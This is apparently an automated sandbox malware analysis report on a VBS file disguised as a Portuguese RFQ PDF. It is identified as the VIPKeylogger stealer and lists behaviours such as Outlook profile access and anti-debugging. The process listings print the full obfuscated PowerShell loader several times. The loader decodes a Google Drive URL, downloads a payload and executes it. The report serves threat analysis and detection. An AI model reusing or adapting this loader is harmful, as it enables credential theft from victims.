Malware Analysis Report

2024-11-30 15:00

Sample ID 241030-g5g2yayamb
Target Pedido de Cotação -RFQ20241029_Pdf.vbs
SHA256 bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3
Tags
discovery execution vipkeylogger collection keylogger stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3

Threat Level: Known bad

The file Pedido de Cotação -RFQ20241029_Pdf.vbs was found to be: Known bad.

Malicious Activity Summary

discovery execution vipkeylogger collection keylogger stealer

VIPKeylogger

Vipkeylogger family

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: PowerShell

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Network Service Discovery

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

outlook_office_path

outlook_win_path

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-30 06:23

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-30 06:23

Reported

2024-10-30 06:25

Platform

win7-20241010-en

Max time kernel

150s

Max time network

19s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241029_Pdf.vbs"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241029_Pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Juxtapositive Slidbanernes fiskeriterritoriet Fiberkufferter vaccinogenous Hyperidrosis #>;$Nidorous='Spondulics';<#dugfaldet professorens Missuits Redefulden #>; function Heterolysis($Stithy){If ($host.DebuggerEnabled) {$palaeographer++;}$Gwantus=$Ammodytidae+$Stithy.'Length'-$palaeographer; for ( $Romanidealets=5;$Romanidealets -lt $Gwantus;$Romanidealets+=6){$Beundringsvrdige=$Romanidealets;$Auxograph+=$Stithy[$Romanidealets];$Superdelicately='Smugkros';}$Auxograph;}function Farveblyantens($borborus){ . ($Aggressiviteten) ($borborus);}$Sagacities=Heterolysis 'OncetMWaileoTydelzSkraaiSej bl hamplSamota useu/ Garv ';$Chirps=Heterolysis 'm,rkrTDde ilForstsMulat1Dub,i2Prede ';$Uncleaned='austr[ MisfnEtoilESp.baTOutw..UnhonsPi kaEPrimoRpalmiv Po li enneCTjenseSlavePForveO PeriI SupiN resuTskikkm ultiaSu menDemaraTy,dtGoverfeKiddur tubk] Assi:Stlan:U,sousPaperEStr acB sstUReligrHvirvI Oppot BilgyRepatPSlicerSuperoFetaotAiredoIn,ercBr dgOUseteLF rar=Utugt$Sem dC HuleHOvervIsonedrTj nepBennssRipra ';$Sagacities+=Heterolysis 'Stint5 alma.L dge0 Trku Co t(SpeciW ldhaiOpdranC,ssidMus eo SkolwGlycosEfter Benb Nfaku,TAceta Affe,1Valou0Recom.Reini0Sam i;Layou Flyv WIncivi Namen Ra o6Ustad4Runds;Schan Prussx ilbe6Sa ny4Histo;Ud.is U flyrPolitvP imp:Dire.1Paten3 Comp1ufl o.Baton0Workb)Pu,sc WondiG anife DuskcPres kMalfeoSaccu/tunic2 Hore0Expon1 Habs0 Dipp0Marge1 Sma 0Fonet1Rusti SmedeFFordoiIchthr TroseAfbjnf forloTaenix nfed/Shera1Sone 3Knkor1Marti.raagu0.nter ';$clamp=Heterolysis 'Nontru,fterSServoE rbitRMarch-ZambiASatisgCharaeSkv dN.efinT,ruct ';$Rackbone=Heterolysis 'DattohCre.stFrasotReplapKan.isTermo: igsa/Inter/ eopd BgegrAesthiAn.envKnotbehavan.Forslgde iroCassio rusegUnrivlDimineHunde. nsumc AbacoLovlim Dela/FejlbuEpitrcBrazo? GeleeDe imxVede,pRagt,oC aqurk ttetVider=WevendTidsho Salaw TripnMellelOrkeso Golda pind ,ors& .maliCeonod Plan=Testp1 ForhxPaaviaPeoplZUnderxSk lez R suzQuindbLank dSinia7 Romb8 RedeXAusteXPe,lvPKr ps1SvmmeMAfdanP,acalf Vol.vD ice_MisunbUna.c4IncomBPreinf.itch0Tor aw EurobLev,rqUnhie7FyrstBdeadmNQualiO ovmoMOpret ';$Referendarens=Heterolysis 'Bio.r>Me,li ';$Aggressiviteten=Heterolysis 'SandsI nsaee Cal x Besp ';$Pottered='Hovedstillingers';$Cryalgesia='\Databaands.Cag';Farveblyantens (Heterolysis ' Sove$Syn,fgmonodlAbranO fgoebMi traNo hoLEpisk:PebreA ntraGEnac gexonuramyloaElemevFlaneA brogtW terI TaxiNArresGafsm lPotl.y Hjag=Reser$Ceskye Disen KrydV lor:YamskAMachiPLampmPDynelD Fllea Intit unwrA all+Forlf$TranscFlaucRsurinyBirumAuhyggl MultG ChimE MembSC,catI Metaa Refl ');Farveblyantens (Heterolysis 'B okb$SuspegHeptaLVaporoOvercBFiskeASyrneLPejus:UncripVo dgaKomm,KB mbeNPenheiSoapwNSkrupgKernesL mpe=Buke $Bema.R,rapeaIni icBesvrKpr.isBSul,hoU vetNFr arEKugle. F,gusMa llP bollLFlykki OtheTAurig( Sire$ ForerSideleMagtffFrembeMlkenr RenseIntr nSm,teDSemidAFonolRIndisEF agmn Thins,reha)Hered ');Farveblyantens (Heterolysis $Uncleaned);$Rackbone=$Paknings[0];$Scotoscope=(Heterolysis 'unabr$Domi,gAandeLBoathoGa.opBS nsua egislUitot:Itchii NdvrS O krOKagefs B,adUSolvelCaro P IndhHA verOLed icMummeYOutmaABlrehnAfbl,iPrelucReveg=HomerNEnateeRv diwCentr- ollO St ubCaesaJNon.eEPartiC.racht vif tderSBan byBa ils V ruTPrisleMu remPharm.BeregNUneffeSigilt equi. asouwMa toeA.gifbkonduCFhovelLsideIRykkee TyrknGoneft R bb ');Farveblyantens ($Scotoscope);Farveblyantens (Heterolysis 'Skrif$inphaIS,lphsafbryoPhysosBantuuDamaslMalebp S othCornioBortlc ,tomyLath aWavennAdunciF ngecGrate.Lkke H Strae NeckaStre dOpstceRodz.r U etsokker[Musci$AktiecAbbrelSkidtaG.undmGlucupEkspe] mphi= rota$ istrSH,neya By.sgSaftnaPolypcVeno,iChilatwildwiFigare BillsExces ');$Speedingly=Heterolysis ' Eksp$anti ISubrisDetaio Unwis VedluStemnlSumakpFeelehClubboBravac oggiyS nbeaSpastnStr.liStaalcTre o. DrikDgo.opoNonmawresidnRadial Usaao,ltfaaVarerdSaturFMicr i,ickelHjnele Bet,(Sac,o$ FusiRPerigaMaturcRaahuk TropbBu.dto NostnAlluveTrecy,oprus$Pol eEA.genb Sld rRomaniBrunseKnsaktLkkesymistu)Tn ep ';$Ebriety=$aggravatingly;Farveblyantens (Heterolysis 'T lpa$ ReingOp amL Fr cO OndyBOverfADdsriLSkole: InveVEneceeOve.hLSodomtMorwka FaarLCircueFdsleNC,rdiH ogikETaba dOli os Lysv=Puckf(u odeT.etereKu.oss MommTInput-AnglopPanteAStri tUnvouh Erst Mid.$Pse,heFolkeBKr ptr Aegri edste NogetKudz,YBiz,r)Cavie ');while (!$Veltalenheds) {Farveblyantens (Heterolysis 'Taran$ ProjgWondelProleoCarpobFor uaMe itlBouil:LetofFSekunoSivmarLegi e AdgasledekkTelesrAkil iOvnemvKvikseOt.emlUdlgssSorgleElodenM,cedsCober= Porp$nea,ttKhe arArcocuFordreLi,je ') ;Farveblyantens $Speedingly;Farveblyantens (Heterolysis ' Byg SHetzeT reopADrgtir d pltsamme- eklaSB,ritlEuryleViza EPapulPPanni Oplsn4 Alst ');Farveblyantens (Heterolysis ' Ko.o$Gavn gMaskiLC iroOMessibBegmaa Aks l Sta,: Mye,VPrea EBrnell BirctResodaMin,rlAsym.E LandnS.hizHPetr,eNoggiDirkapSSix.y=alcoh(AllesT HoveEDubbes.mnorTnonel-Al haPGyne aP ppyt ntenhProdu Inte.$JaminE rggB replRFyr tiForeceHusteT,pspay Stee)A ten ') ;Farveblyantens (Heterolysis 'Clube$DiskogArbejlOverdodramabGodseATe rilfl gt: ollskUnp,rEAb.epr Hy.rnSrbehe F.grrGena e UopsAKommukmodspTGa,eporenteRHvid EHairgRsjlesSInter= Verd$Mi,coGfl.orlSynoroAnti bKvindAMu aglSecun: .utldTaksiEBi,ulR Pl dAToupyY.ndtrsThyme+ Stor+Sper % Tmme$ CellpDel,ga S ulkTh rmN upariSidebn,veriGPleatSUnpos.prececForbeoF uefUResalnAltertturba ') ;$Rackbone=$Paknings[$Kernereaktorers];}$Monkess=299952;$Troperegnens=31724;Farveblyantens (Heterolysis 'B for$bardiG U.gdl ydeloHumo b rugtaPerinLKedel:RokkeksauldiOut,iNFljalA Kl seUnsupS yd yTMetamhMotorEAssonTAs.roiMaskiCStussaEkspoL tounlUng.ay Coss Kant = Iltr TableGNondiE A beTMaihe-Picolc prosoRondoNPr ciTha raE ,aluNRakesTHy.og P ead$ TredeForreb ociarFinhviLis.eE Kry tPaideyKolon ');Farveblyantens (Heterolysis 'Rumle$ForndgTnksol lerco idenbCephaatranslRaket:N nreO reaciStraplHandiiArvensJawf.hinco Rares= Vete Asfal[Ula.rSSpeciyArveasB,nomtdelpreVej em Gowd. erapCPal,eoPlentnOpslavElusieKrea.rQuadrtMe be] Prio:Thirs:ElskeFEffekrHderso.atstmChronB GrovaTinstsBeepeeIsoci6Glend4HyperSShammt Thi rSmr.ei Pr anRealkgAgree(fa.ds$Rnke K chasiCataln HydraPanele HomosExci,t Lavvh AmoreA seltHeavyiUtaalcJub.laSelvilGarotl irexy Tidd)major ');Farveblyantens (Heterolysis 'Depil$PaleoGTabb LFuroroUnchrBDolinaForstLSu fo: I,dhFAmireaTroldl B mbdPatrilplynde F,rsmCinem Rel e= Undi Glass[GenneS ountyAnno,SCutofTAd.neEPaireM P an.TilsiTQu.nae,ntisxNonubt Prin. iltee As.onSkilbcFlygeO BoblDUgle I CrasnFratrG Exce]Bevis:Kreml: ileAMe orsAl orcBu,triI geni s.ok.OpbraGO,erhEA,delTAf egSBr nzTLiebeR oldnivvninNVokalGAnst.(Per b$ krabOKo.leiLserslPremoICambiSTestpH Dees)Ep.xy ');Farveblyantens (Heterolysis 'Theti$ Befag Car.L U,clocorinBHemibAP eefl emat: OversJagthaSauntMSylleuSndagERetmslBarges Dokt=Tha.a$ evefM,mboAFinkmLSubtlD Sal.lScutte TortMBio e.Acyros idsruforsrb ,ayoSMittetEvittRtekn iRecalN PatogPyrrh(Jubil$ UforM ysseoHa shNAlmenKSkandeDobosSTraucSSteam, apno$subb tBaronRcowieOFrakepDecimEEpiphRTreadEEftergdelggNEks le.vertn DyrksSuber) Hors ');Farveblyantens $Samuels;"

Network

N/A

Files

memory/2992-4-0x000007FEF620E000-0x000007FEF620F000-memory.dmp

memory/2992-5-0x000000001B2A0000-0x000000001B582000-memory.dmp

memory/2992-6-0x0000000001F50000-0x0000000001F58000-memory.dmp

memory/2992-7-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/2992-8-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/2992-9-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/2992-10-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/2992-11-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/2992-12-0x000007FEF620E000-0x000007FEF620F000-memory.dmp

memory/2992-13-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/2992-14-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/2992-15-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/2992-16-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/2992-17-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-30 06:23

Reported

2024-10-30 06:26

Platform

win10v2004-20241007-en

Max time kernel

141s

Max time network

155s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241029_Pdf.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Vipkeylogger family

vipkeylogger

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241029_Pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Juxtapositive Slidbanernes fiskeriterritoriet Fiberkufferter vaccinogenous Hyperidrosis #>;$Nidorous='Spondulics';<#dugfaldet professorens Missuits Redefulden #>; function Heterolysis($Stithy){If ($host.DebuggerEnabled) {$palaeographer++;}$Gwantus=$Ammodytidae+$Stithy.'Length'-$palaeographer; for ( $Romanidealets=5;$Romanidealets -lt $Gwantus;$Romanidealets+=6){$Beundringsvrdige=$Romanidealets;$Auxograph+=$Stithy[$Romanidealets];$Superdelicately='Smugkros';}$Auxograph;}function Farveblyantens($borborus){ . ($Aggressiviteten) ($borborus);}$Sagacities=Heterolysis 'OncetMWaileoTydelzSkraaiSej bl hamplSamota useu/ Garv ';$Chirps=Heterolysis 'm,rkrTDde ilForstsMulat1Dub,i2Prede ';$Uncleaned='austr[ MisfnEtoilESp.baTOutw..UnhonsPi kaEPrimoRpalmiv Po li enneCTjenseSlavePForveO PeriI SupiN resuTskikkm ultiaSu menDemaraTy,dtGoverfeKiddur tubk] Assi:Stlan:U,sousPaperEStr acB sstUReligrHvirvI Oppot BilgyRepatPSlicerSuperoFetaotAiredoIn,ercBr dgOUseteLF rar=Utugt$Sem dC HuleHOvervIsonedrTj nepBennssRipra ';$Sagacities+=Heterolysis 'Stint5 alma.L dge0 Trku Co t(SpeciW ldhaiOpdranC,ssidMus eo SkolwGlycosEfter Benb Nfaku,TAceta Affe,1Valou0Recom.Reini0Sam i;Layou Flyv WIncivi Namen Ra o6Ustad4Runds;Schan Prussx ilbe6Sa ny4Histo;Ud.is U flyrPolitvP imp:Dire.1Paten3 Comp1ufl o.Baton0Workb)Pu,sc WondiG anife DuskcPres kMalfeoSaccu/tunic2 Hore0Expon1 Habs0 Dipp0Marge1 Sma 0Fonet1Rusti SmedeFFordoiIchthr TroseAfbjnf forloTaenix nfed/Shera1Sone 3Knkor1Marti.raagu0.nter ';$clamp=Heterolysis 'Nontru,fterSServoE rbitRMarch-ZambiASatisgCharaeSkv dN.efinT,ruct ';$Rackbone=Heterolysis 'DattohCre.stFrasotReplapKan.isTermo: igsa/Inter/ eopd BgegrAesthiAn.envKnotbehavan.Forslgde iroCassio rusegUnrivlDimineHunde. nsumc AbacoLovlim Dela/FejlbuEpitrcBrazo? GeleeDe imxVede,pRagt,oC aqurk ttetVider=WevendTidsho Salaw TripnMellelOrkeso Golda pind ,ors& .maliCeonod Plan=Testp1 ForhxPaaviaPeoplZUnderxSk lez R suzQuindbLank dSinia7 Romb8 RedeXAusteXPe,lvPKr ps1SvmmeMAfdanP,acalf Vol.vD ice_MisunbUna.c4IncomBPreinf.itch0Tor aw EurobLev,rqUnhie7FyrstBdeadmNQualiO ovmoMOpret ';$Referendarens=Heterolysis 'Bio.r>Me,li ';$Aggressiviteten=Heterolysis 'SandsI nsaee Cal x Besp ';$Pottered='Hovedstillingers';$Cryalgesia='\Databaands.Cag';Farveblyantens (Heterolysis ' Sove$Syn,fgmonodlAbranO fgoebMi traNo hoLEpisk:PebreA ntraGEnac gexonuramyloaElemevFlaneA brogtW terI TaxiNArresGafsm lPotl.y Hjag=Reser$Ceskye Disen KrydV lor:YamskAMachiPLampmPDynelD Fllea Intit unwrA all+Forlf$TranscFlaucRsurinyBirumAuhyggl MultG ChimE MembSC,catI Metaa Refl ');Farveblyantens (Heterolysis 'B okb$SuspegHeptaLVaporoOvercBFiskeASyrneLPejus:UncripVo dgaKomm,KB mbeNPenheiSoapwNSkrupgKernesL mpe=Buke $Bema.R,rapeaIni icBesvrKpr.isBSul,hoU vetNFr arEKugle. F,gusMa llP bollLFlykki OtheTAurig( Sire$ ForerSideleMagtffFrembeMlkenr RenseIntr nSm,teDSemidAFonolRIndisEF agmn Thins,reha)Hered ');Farveblyantens (Heterolysis $Uncleaned);$Rackbone=$Paknings[0];$Scotoscope=(Heterolysis 'unabr$Domi,gAandeLBoathoGa.opBS nsua egislUitot:Itchii NdvrS O krOKagefs B,adUSolvelCaro P IndhHA verOLed icMummeYOutmaABlrehnAfbl,iPrelucReveg=HomerNEnateeRv diwCentr- ollO St ubCaesaJNon.eEPartiC.racht vif tderSBan byBa ils V ruTPrisleMu remPharm.BeregNUneffeSigilt equi. asouwMa toeA.gifbkonduCFhovelLsideIRykkee TyrknGoneft R bb ');Farveblyantens ($Scotoscope);Farveblyantens (Heterolysis 'Skrif$inphaIS,lphsafbryoPhysosBantuuDamaslMalebp S othCornioBortlc ,tomyLath aWavennAdunciF ngecGrate.Lkke H Strae NeckaStre dOpstceRodz.r U etsokker[Musci$AktiecAbbrelSkidtaG.undmGlucupEkspe] mphi= rota$ istrSH,neya By.sgSaftnaPolypcVeno,iChilatwildwiFigare BillsExces ');$Speedingly=Heterolysis ' Eksp$anti ISubrisDetaio Unwis VedluStemnlSumakpFeelehClubboBravac oggiyS nbeaSpastnStr.liStaalcTre o. DrikDgo.opoNonmawresidnRadial Usaao,ltfaaVarerdSaturFMicr i,ickelHjnele Bet,(Sac,o$ FusiRPerigaMaturcRaahuk TropbBu.dto NostnAlluveTrecy,oprus$Pol eEA.genb Sld rRomaniBrunseKnsaktLkkesymistu)Tn ep ';$Ebriety=$aggravatingly;Farveblyantens (Heterolysis 'T lpa$ ReingOp amL Fr cO OndyBOverfADdsriLSkole: InveVEneceeOve.hLSodomtMorwka FaarLCircueFdsleNC,rdiH ogikETaba dOli os Lysv=Puckf(u odeT.etereKu.oss MommTInput-AnglopPanteAStri tUnvouh Erst Mid.$Pse,heFolkeBKr ptr Aegri edste NogetKudz,YBiz,r)Cavie ');while (!$Veltalenheds) {Farveblyantens (Heterolysis 'Taran$ ProjgWondelProleoCarpobFor uaMe itlBouil:LetofFSekunoSivmarLegi e AdgasledekkTelesrAkil iOvnemvKvikseOt.emlUdlgssSorgleElodenM,cedsCober= Porp$nea,ttKhe arArcocuFordreLi,je ') ;Farveblyantens $Speedingly;Farveblyantens (Heterolysis ' Byg SHetzeT reopADrgtir d pltsamme- eklaSB,ritlEuryleViza EPapulPPanni Oplsn4 Alst ');Farveblyantens (Heterolysis ' Ko.o$Gavn gMaskiLC iroOMessibBegmaa Aks l Sta,: Mye,VPrea EBrnell BirctResodaMin,rlAsym.E LandnS.hizHPetr,eNoggiDirkapSSix.y=alcoh(AllesT HoveEDubbes.mnorTnonel-Al haPGyne aP ppyt ntenhProdu Inte.$JaminE rggB replRFyr tiForeceHusteT,pspay Stee)A ten ') ;Farveblyantens (Heterolysis 'Clube$DiskogArbejlOverdodramabGodseATe rilfl gt: ollskUnp,rEAb.epr Hy.rnSrbehe F.grrGena e UopsAKommukmodspTGa,eporenteRHvid EHairgRsjlesSInter= Verd$Mi,coGfl.orlSynoroAnti bKvindAMu aglSecun: .utldTaksiEBi,ulR Pl dAToupyY.ndtrsThyme+ Stor+Sper % Tmme$ CellpDel,ga S ulkTh rmN upariSidebn,veriGPleatSUnpos.prececForbeoF uefUResalnAltertturba ') ;$Rackbone=$Paknings[$Kernereaktorers];}$Monkess=299952;$Troperegnens=31724;Farveblyantens (Heterolysis 'B for$bardiG U.gdl ydeloHumo b rugtaPerinLKedel:RokkeksauldiOut,iNFljalA Kl seUnsupS yd yTMetamhMotorEAssonTAs.roiMaskiCStussaEkspoL tounlUng.ay Coss Kant = Iltr TableGNondiE A beTMaihe-Picolc prosoRondoNPr ciTha raE ,aluNRakesTHy.og P ead$ TredeForreb ociarFinhviLis.eE Kry tPaideyKolon ');Farveblyantens (Heterolysis 'Rumle$ForndgTnksol lerco idenbCephaatranslRaket:N nreO reaciStraplHandiiArvensJawf.hinco Rares= Vete Asfal[Ula.rSSpeciyArveasB,nomtdelpreVej em Gowd. erapCPal,eoPlentnOpslavElusieKrea.rQuadrtMe be] Prio:Thirs:ElskeFEffekrHderso.atstmChronB GrovaTinstsBeepeeIsoci6Glend4HyperSShammt Thi rSmr.ei Pr anRealkgAgree(fa.ds$Rnke K chasiCataln HydraPanele HomosExci,t Lavvh AmoreA seltHeavyiUtaalcJub.laSelvilGarotl irexy Tidd)major ');Farveblyantens (Heterolysis 'Depil$PaleoGTabb LFuroroUnchrBDolinaForstLSu fo: I,dhFAmireaTroldl B mbdPatrilplynde F,rsmCinem Rel e= Undi Glass[GenneS ountyAnno,SCutofTAd.neEPaireM P an.TilsiTQu.nae,ntisxNonubt Prin. iltee As.onSkilbcFlygeO BoblDUgle I CrasnFratrG Exce]Bevis:Kreml: ileAMe orsAl orcBu,triI geni s.ok.OpbraGO,erhEA,delTAf egSBr nzTLiebeR oldnivvninNVokalGAnst.(Per b$ krabOKo.leiLserslPremoICambiSTestpH Dees)Ep.xy ');Farveblyantens (Heterolysis 'Theti$ Befag Car.L U,clocorinBHemibAP eefl emat: OversJagthaSauntMSylleuSndagERetmslBarges Dokt=Tha.a$ evefM,mboAFinkmLSubtlD Sal.lScutte TortMBio e.Acyros idsruforsrb ,ayoSMittetEvittRtekn iRecalN PatogPyrrh(Jubil$ UforM ysseoHa shNAlmenKSkandeDobosSTraucSSteam, apno$subb tBaronRcowieOFrakepDecimEEpiphRTreadEEftergdelggNEks le.vertn DyrksSuber) Hors ');Farveblyantens $Samuels;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Juxtapositive Slidbanernes fiskeriterritoriet Fiberkufferter vaccinogenous Hyperidrosis #>;$Nidorous='Spondulics';<#dugfaldet professorens Missuits Redefulden #>; function Heterolysis($Stithy){If ($host.DebuggerEnabled) {$palaeographer++;}$Gwantus=$Ammodytidae+$Stithy.'Length'-$palaeographer; for ( $Romanidealets=5;$Romanidealets -lt $Gwantus;$Romanidealets+=6){$Beundringsvrdige=$Romanidealets;$Auxograph+=$Stithy[$Romanidealets];$Superdelicately='Smugkros';}$Auxograph;}function Farveblyantens($borborus){ . ($Aggressiviteten) ($borborus);}$Sagacities=Heterolysis 'OncetMWaileoTydelzSkraaiSej bl hamplSamota useu/ Garv ';$Chirps=Heterolysis 'm,rkrTDde ilForstsMulat1Dub,i2Prede ';$Uncleaned='austr[ MisfnEtoilESp.baTOutw..UnhonsPi kaEPrimoRpalmiv Po li enneCTjenseSlavePForveO PeriI SupiN resuTskikkm ultiaSu menDemaraTy,dtGoverfeKiddur tubk] Assi:Stlan:U,sousPaperEStr acB sstUReligrHvirvI Oppot BilgyRepatPSlicerSuperoFetaotAiredoIn,ercBr dgOUseteLF rar=Utugt$Sem dC HuleHOvervIsonedrTj nepBennssRipra ';$Sagacities+=Heterolysis 'Stint5 alma.L dge0 Trku Co t(SpeciW ldhaiOpdranC,ssidMus eo SkolwGlycosEfter Benb Nfaku,TAceta Affe,1Valou0Recom.Reini0Sam i;Layou Flyv WIncivi Namen Ra o6Ustad4Runds;Schan Prussx ilbe6Sa ny4Histo;Ud.is U flyrPolitvP imp:Dire.1Paten3 Comp1ufl o.Baton0Workb)Pu,sc WondiG anife DuskcPres kMalfeoSaccu/tunic2 Hore0Expon1 Habs0 Dipp0Marge1 Sma 0Fonet1Rusti SmedeFFordoiIchthr TroseAfbjnf forloTaenix nfed/Shera1Sone 3Knkor1Marti.raagu0.nter ';$clamp=Heterolysis 'Nontru,fterSServoE rbitRMarch-ZambiASatisgCharaeSkv dN.efinT,ruct ';$Rackbone=Heterolysis 'DattohCre.stFrasotReplapKan.isTermo: igsa/Inter/ eopd BgegrAesthiAn.envKnotbehavan.Forslgde iroCassio rusegUnrivlDimineHunde. nsumc AbacoLovlim Dela/FejlbuEpitrcBrazo? GeleeDe imxVede,pRagt,oC aqurk ttetVider=WevendTidsho Salaw TripnMellelOrkeso Golda pind ,ors& .maliCeonod Plan=Testp1 ForhxPaaviaPeoplZUnderxSk lez R suzQuindbLank dSinia7 Romb8 RedeXAusteXPe,lvPKr ps1SvmmeMAfdanP,acalf Vol.vD ice_MisunbUna.c4IncomBPreinf.itch0Tor aw EurobLev,rqUnhie7FyrstBdeadmNQualiO ovmoMOpret ';$Referendarens=Heterolysis 'Bio.r>Me,li ';$Aggressiviteten=Heterolysis 'SandsI nsaee Cal x Besp ';$Pottered='Hovedstillingers';$Cryalgesia='\Databaands.Cag';Farveblyantens (Heterolysis ' Sove$Syn,fgmonodlAbranO fgoebMi traNo hoLEpisk:PebreA ntraGEnac gexonuramyloaElemevFlaneA brogtW terI TaxiNArresGafsm lPotl.y Hjag=Reser$Ceskye Disen KrydV lor:YamskAMachiPLampmPDynelD Fllea Intit unwrA all+Forlf$TranscFlaucRsurinyBirumAuhyggl MultG ChimE MembSC,catI Metaa Refl ');Farveblyantens 